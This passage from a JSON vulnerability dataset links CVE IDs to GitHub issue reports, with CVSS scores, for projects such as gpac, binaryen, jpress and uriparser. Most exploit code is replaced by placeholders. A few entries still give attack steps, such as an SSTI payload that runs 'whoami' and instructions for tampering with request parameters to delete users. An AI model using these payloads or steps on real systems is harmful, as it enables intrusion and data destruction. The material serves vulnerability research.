        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46042",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2002",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2002",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T16:16:38Z",
        "description": "Untrusted pointer dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46043",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2001",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2001",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T16:04:39Z",
        "description": "Untrusted Pointer Dereference in gf_list_count (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result segmentation fault bt CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46044",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2006",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2006",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T18:20:11Z",
        "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46045",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2007",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2007",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T18:37:49Z",
        "description": "Abort failed in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Abort bt CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46046",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2005",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2005",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T17:52:53Z",
        "description": "Untrusted pointer dereference in gf_isom_box_size () . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46047",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2008",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2008",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T18:56:01Z",
        "description": "Untrusted pointer dereference in gf_hinter_finalize (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Abort bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46048",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4412",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4412",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2021-12-25T07:56:15Z",
        "description": "A abort failure in APITAG Version: APITAG command: APITAG FILETAG Result abort bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46049",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2013",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2013",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-24T07:13:51Z",
        "description": "Untrusted pointer dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46050",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4391",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4391",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2021-12-14T12:41:56Z",
        "description": "Invalid memory address dereference in __vfprintf_internal (). Version: APITAG System information command: APITAG FILETAG Result APITAG GDB information ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46051",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2011",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2011",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-24T06:14:20Z",
        "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46052",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4411",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4411",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2021-12-25T07:43:44Z",
        "description": "A abort failure in APITAG (). Version: APITAG command: APITAG FILETAG Result Aborted. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46053",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4392",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4392",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2021-12-14T12:53:22Z",
        "description": "Program terminated with signal SIGKILL, Killed.. Version: APITAG System information command: APITAG FILETAG Result Program terminated with signal SIGKILL, Killed.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46054",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4410",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4410",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2021-12-25T07:10:11Z",
        "description": "A abort failure in APITAG ). Version: APITAG command: APITAG FILETAG Result APITAG bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46055",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4413",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4413",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2021-12-25T08:10:49Z",
        "description": "A abort failure in APITAG Version: APITAG command: APITAG FILETAG Result Aborted. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46062",
        "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/59",
        "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/59",
        "Repo_new": "ming-soft/mcms",
        "Issue_Created_At": "2021-12-28T13:49:01Z",
        "description": "APITAG any file. SSTI APITAG template is used in the project\uff0cand there is no secure configuration Insert the payload in the background > system settings > template management APITAG ${value(\"whoami\")} FILETAG PATHTAG There's a suffix check, it's written to the file FILETAG PATHTAG APITAG of this class is called FILETAG coverage PATHTAG APITAG the home page FILETAG Delete any file If the APITAG argument exists, the corresponding file is deleted FILETAG Call the APITAG FILETAG poc\uff1a APITAG destination",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46083",
        "Issue_Url_old": "https://github.com/chenniqing/uscat/issues/1",
        "Issue_Url_new": "https://github.com/chenniqing/uscat/issues/1",
        "Repo_new": "chenniqing/uscat",
        "Issue_Created_At": "2021-12-29T02:42:51Z",
        "description": "There is a stored xss vulnerability exists in uscat.. FILETAG The input sensitive parameters are not filtered, resulting in malicious code at URL: URLTAG After being parsed and executed, all users accessing this URL will be affected. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-46084",
        "Issue_Url_old": "https://github.com/chenniqing/uscat/issues/2",
        "Issue_Url_new": "https://github.com/chenniqing/uscat/issues/2",
        "Repo_new": "chenniqing/uscat",
        "Issue_Created_At": "2021-12-29T03:32:16Z",
        "description": "There is a stored xss vulnerability exists in uscat.. FILETAG XSS payload will be executed on the registration page at the front of the website. Any user who opens the registration page(url: URLTAG will be affected FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-46085",
        "Issue_Url_old": "https://github.com/zhangyd-c/OneBlog/issues/29",
        "Issue_Url_new": "https://github.com/zhangyd-c/oneblog/issues/29",
        "Repo_new": "zhangyd-c/oneblog",
        "Issue_Created_At": "2021-12-29T09:33:16Z",
        "description": "There is a Insecure Permissions vulnerability exists in APITAG NUMBERTAG FILETAG Low level administrator root NUMBERTAG FILETAG Step NUMBERTAG log in to the system with root NUMBERTAG and enter the user management page FILETAG Step NUMBERTAG click the delete button to directly delete the administrator user admin FILETAG Delete succeeded\uff01 In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself) The first step is to log in to the background with root NUMBERTAG account and enter user management. FILETAG Step NUMBERTAG after the packet capturing mode is enabled, click the delete button corresponding to user test FILETAG You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user. FILETAG Delete succeeded\uff01",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46086",
        "Issue_Url_old": "https://github.com/mindskip/xzs-mysql/issues/327",
        "Issue_Url_new": "https://github.com/mindskip/xzs-mysql/issues/327",
        "Repo_new": "mindskip/xzs-mysql",
        "Issue_Created_At": "2021-12-30T05:50:59Z",
        "description": "There is a Insecure Permissions vulnerability exists in XZS. FILETAG The total exam time is NUMBERTAG minutes. You can see the remaining time displayed in the upper right. FILETAG Step NUMBERTAG open the burpsuite agent and click the submit button to obtain the packet capture data. FILETAG The value of dotime indicates the number of seconds between the beginning of this test and clicking submit torque, which can be modified to any number. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46087",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/19",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/19",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2020-06-03T14:27:59Z",
        "description": "A Stored XSS vulnerability exists in jfinal_cms NUMBERTAG There is a storage XSS vulnerability in the modification of jfinal_CMS user's personal information. The attacker can insert malicious XSS code into the modification of personal information, and then successfully trigger XSS attack when the administrator user views the user's personal information. First, register a user test, then enter the personal information page, insert the malicious XSS attack code in the remarks: payload: ERRORTAG FILETAG Then use the administrator account to view the user information: FILETAG Successfully triggered malicious XSS Code: FILETAG Safety advice: strictly filter the user's input",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-46089",
        "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3331",
        "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3331",
        "Repo_new": "jeecgboot/jeecg-boot",
        "Issue_Created_At": "2021-12-29T08:36:51Z",
        "description": "There is an SQL injection vulnerability that can operate the database with root privileges.. version: APITAG poc: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46104",
        "Issue_Url_old": "https://github.com/webp-sh/webp_server_go/issues/92",
        "Issue_Url_new": "https://github.com/webp-sh/webp_server_go/issues/92",
        "Repo_new": "webp-sh/webp_server_go",
        "Issue_Created_At": "2021-12-30T07:58:10Z",
        "description": "Directory Traversal Vulnerability. I found a directory traversal vulnerability in the system. Can traverse the files on the server. FILETAG Solution: Restrict special symbols in the path, such as ../",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46114",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/172",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/172",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2022-01-09T08:54:40Z",
        "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677fproduct. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46115",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/169",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/169",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2022-01-09T08:49:15Z",
        "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u4e0a\u4f20. \u5ba1\u8ba1\u8fc7\u7a0b APITAG APITAG APITAG ERRORTAG \u6548\u679c\u6f14\u793a \u5f31\u5bc6\u7801\u8fdb\u5165\u540e\u53f0\uff0c\u4fee\u6539\u4e0a\u4f20 FILETAG FILETAG \u8bbf\u95ee URLTAG \uff0c\u53ef\u4ee5\u770b\u5230\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-46116",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/168",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/168",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2022-01-09T08:44:35Z",
        "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u5b89\u88c5. \u5ba1\u8ba1\u8fc7\u7a0b APITAG \u5728\u9875\u9762\u4e0a\u70b9\u51fb\u5b89\u88c5\u6a21\u677f FILETAG \u4e0a\u4f20\u6076\u610f\u6a21\u677f\u4e4b\u540e\uff0c\u7a0b\u5e8f\u8fd0\u884c\u5230 APITAG PATHTAG FILETAG \u6765\u770b\u5177\u4f53\u4ee3\u7801\uff0c APITAG APITAG FILETAG \u7136\u540e\u5c31\u53ef\u4ee5\u770b\u5230\uff0c\u6211\u4eec\u5199\u7684\u6076\u610f\u6a21\u677f\u5df2\u7ecf\u88ab\u89e3\u538b\u5230\u4e86\u8fd9\u4e2a\u76ee\u5f55\u4e0b FILETAG APITAG APITAG APITAG ERRORTAG \u63a5\u4e0b\u6765\u600e\u4e48\u8fdb\u884c\u5229\u7528\u5462\uff1f\u770b\u5230\u540e\u53f0\u8fd9\u4e2a\u5730\u65b9\u5b58\u5728\u4e00\u4e2a\u6a21\u677f\u9884\u89c8\u529f\u80fd FILETAG APITAG APITAG \u8fd9\u4e2a\u6a21\u677f FILETAG APITAG FILETAG \u6548\u679c\u6f14\u793a \u5f31\u5bc6\u7801\u8fdb\u5165\u540e\u53f0\uff0c\u5b89\u88c5\u6076\u610f\u6a21\u677f FILETAG FILETAG \u5f00\u542f\u6a21\u677f\u9884\u89c8\u529f\u80fd FILETAG \u8bbf\u95ee URLTAG \uff0c\u53d1\u73b0\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-46117",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/171",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/171",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2022-01-09T08:53:50Z",
        "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677fpage. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-46118",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/170",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/170",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2022-01-09T08:52:56Z",
        "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677f. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-46141",
        "Issue_Url_old": "https://github.com/uriparser/uriparser/issues/121",
        "Issue_Url_new": "https://github.com/uriparser/uriparser/issues/121",
        "Repo_new": "uriparser/uriparser",
        "Issue_Created_At": "2021-09-29T06:35:00Z",
        "description": "input format check and memory manager issue. A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand. The bug was found with a fuzzer based on the test APITAG For the input provided by the user, it is the address on the Stack Memory, and is free to see if it is the address on the HEAP Memory. Also, as free also uses Memory Manager as shown below, malloc should also use Memory Manager _memory >free(memory, (URI_CHAR )uri APITAG It also requires a Format check for the inputs that the user accidentally or incorrectly entered. _ crash log NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d9be0 (pc NUMBERTAG ca NUMBERTAG bp NUMBERTAG sp NUMBERTAG fff NUMBERTAG d NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG ca NUMBERTAG in APITAG , unsigned long, unsigned long, APITAG , APITAG NUMBERTAG d NUMBERTAG in free NUMBERTAG c NUMBERTAG in (anonymous APITAG , void NUMBERTAG fca1c NUMBERTAG a4b2 in APITAG Steps to reproduce NUMBERTAG git clone FILETAG NUMBERTAG cd uriparser & mkdir build & cd build NUMBERTAG Build cmake APITAG APITAG DBUILD_SHARED_LIBS:BOOL=ON .. make j NUMBERTAG Download the attached APITAG NUMBERTAG Build TEST CODE NUMBERTAG cpp) clang++ g fsanitize=address,fuzzer no link o NUMBERTAG cpp I PATHTAG Luriparser/build luriparser NUMBERTAG Run PATHTAG NUMBERTAG OS:ubuntu NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46142",
        "Issue_Url_old": "https://github.com/uriparser/uriparser/issues/122",
        "Issue_Url_new": "https://github.com/uriparser/uriparser/issues/122",
        "Repo_new": "uriparser/uriparser",
        "Issue_Created_At": "2021-09-29T06:38:40Z",
        "description": "input format check and memory manager issue2. A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand. The bug was found with a fuzzer based on the test APITAG Test APITAG APITAG assigns a URI, but this is an address on Stack Memory To assign normally, you must assign a memory from the object in APITAG because it is memory free from the object in APITAG With different Memory Manager, you can become a problem. It also requires a Format check for the inputs that the user accidentally or incorrectly entered. _ crash log NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d9be0 (pc NUMBERTAG ca NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffd NUMBERTAG e6e0 T0) APITAG signal is caused by a WRITE memory access NUMBERTAG ca NUMBERTAG in APITAG , unsigned long, unsigned long, APITAG , APITAG NUMBERTAG d NUMBERTAG in free NUMBERTAG c NUMBERTAG in (anonymous APITAG , void NUMBERTAG faf2e1ac4b2 in APITAG Steps to reproduce NUMBERTAG git clone FILETAG NUMBERTAG cd uriparser & mkdir build & cd build NUMBERTAG Build cmake APITAG APITAG DBUILD_SHARED_LIBS:BOOL=ON .. make j NUMBERTAG Download the attached APITAG NUMBERTAG Build TEST CODE NUMBERTAG cpp) clang++ g fsanitize=address,fuzzer no link o NUMBERTAG cpp I PATHTAG I uriparser/ Luriparser/build luriparser NUMBERTAG Run PATHTAG NUMBERTAG OS:ubuntu NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46143",
        "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/532",
        "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/532",
        "Repo_new": "libexpat/libexpat",
        "Issue_Created_At": "2021-12-30T19:25:05Z",
        "description": "Reserved NUMBERTAG security issue upcoming). TBA",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46168",
        "Issue_Url_old": "https://github.com/nimble-code/Spin/issues/56",
        "Issue_Url_new": "https://github.com/nimble-code/spin/issues/56",
        "Repo_new": "nimble-code/spin",
        "Issue_Created_At": "2022-01-02T14:04:47Z",
        "description": "Out of bounds Write in APITAG Out of bounds Write in APITAG Description Out of bounds Write in APITAG at APITAG If there are NUMBERTAG APITAG \uff0cthe yyin will add NUMBERTAG APITAG then, the APITAG at main NUMBERTAG will crash. APITAG If there are more APITAG than APITAG , the APITAG will be negative. APITAG then, the variables before APITAG will add NUMBERTAG Should there be a limit? version NUMBERTAG a0a5 APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc APITAG command APITAG Result ERRORTAG gdb ERRORTAG poc APITAG command APITAG Result ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46169",
        "Issue_Url_old": "https://github.com/nimble-code/Modex/issues/10",
        "Issue_Url_new": "https://github.com/nimble-code/modex/issues/10",
        "Repo_new": "nimble-code/modex",
        "Issue_Created_At": "2022-01-02T17:23:15Z",
        "description": "Use After Free. Use After Free Description I am learning model checking. But I run a fuzzer for fun today. My fuzzer has found a Use After Free in modex. The chunk NUMBERTAG b NUMBERTAG b0 was APITAG the tcache key was covered and the chunk was freed again. version acfa NUMBERTAG APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc CODETAG command APITAG Result ERRORTAG gdb APITAG APITAG n ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46170",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4917",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4917",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-03T03:39:39Z",
        "description": "Use After Free at PATHTAG in APITAG APITAG revision a6ab5e9 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case CODETAG Execution steps APITAG asan log ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46171",
        "Issue_Url_old": "https://github.com/nimble-code/Modex/issues/8",
        "Issue_Url_new": "https://github.com/nimble-code/modex/issues/8",
        "Repo_new": "nimble-code/modex",
        "Issue_Created_At": "2022-01-02T11:41:42Z",
        "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description NULL Pointer Dereference in APITAG at APITAG If there is no APITAG in the first argument of APITAG , s will be NULL and the next APITAG will crash. CODETAG CODETAG CODETAG version acfa NUMBERTAG APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc CODETAG command APITAG Result APITAG gdb CODETAG fix Should we add some code here to handle it? If there is no APITAG \uff0cget the substring from the NUMBERTAG st '(' to the NUMBERTAG st ',' in APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46203",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/13",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/13",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2022-01-04T02:10:14Z",
